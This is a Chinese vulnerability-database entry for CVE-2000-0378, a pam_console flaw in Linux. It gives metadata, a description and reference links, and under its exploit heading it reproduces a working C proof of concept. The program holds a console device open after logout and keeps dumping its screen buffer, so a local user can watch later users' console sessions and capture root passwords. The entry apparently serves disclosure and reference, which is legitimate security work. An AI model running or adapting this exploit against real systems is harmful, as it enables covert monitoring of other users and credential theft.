多个Linux厂商的pam_console漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105813 漏洞类型 访问验证错误
发布时间 2000-05-03 更新时间 2005-05-02
CVE编号 CVE-2000-0378 CNNVD-ID CNNVD-200005-020
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19900
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-020
|漏洞详情
Linux系统下的pam_consolePAM模块有根据登陆用户修改多个设备文件属主的作用,但在用户退出登陆后,打开文件描述符仍将维护这些设备,随后的用户可以利用这个漏洞在登陆时做嗅探行为。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/1176/info

A vulnerability exists in the pam_console PAM module, included as part of any Linux system running PAM. pam_console exists to own certain devices to users logging in to the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon logging in, and chown them back to being owned by root upon logout. However, as certain devices do not have a 'hangup' mechanism, like a tty device, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow an malicious user to sniff other users console sessions, and potentially obtain the root password if the root user logs in, or a user su's to root. They could also surreptitiously execute commands as the user on the console.
*/

#include <sys/fcntl.h>

main(int argc,char*argv[]) {
  char buf[80*24];
  int f=open(argv[1],O_RDWR);
  while (1) {
    lseek(f,0,0);
    read(f,buf,sizeof(buf));
    write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi
    write(1,buf,sizeof(buf));
    usleep(10000);
  }
}
|参考资料

来源:BID
名称:1176
链接:http://www.securityfocus.com/bid/1176
来源:BUGTRAQ
名称:20000502pam_consolebug
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0023.html